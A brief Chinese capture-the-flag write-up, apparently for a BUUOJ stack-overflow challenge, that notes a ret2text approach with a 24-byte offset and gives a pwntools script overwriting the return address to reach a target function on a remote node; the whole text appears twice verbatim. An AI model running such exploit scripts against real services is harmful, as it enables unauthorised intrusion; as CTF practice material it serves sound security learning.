1,三连
思路:栈溢出
2,IDA分析
利用函数:
思路:ret2text
偏移:24
3,payload
from pwn import *
context.log_level="debug"
r=remote('node4.buuoj.cn',29195)
flag = 0x804856D
payload = 24 * 'a' + p32(flag)
r.send(payload)
r.interactive()
1,三连
思路:栈溢出
2,IDA分析
利用函数:
思路:ret2text
偏移:24
3,payload
from pwn import *
context.log_level="debug"
r=remote('node4.buuoj.cn',29195)
flag = 0x804856D
payload = 24 * 'a' + p32(flag)
r.send(payload)
r.interactive()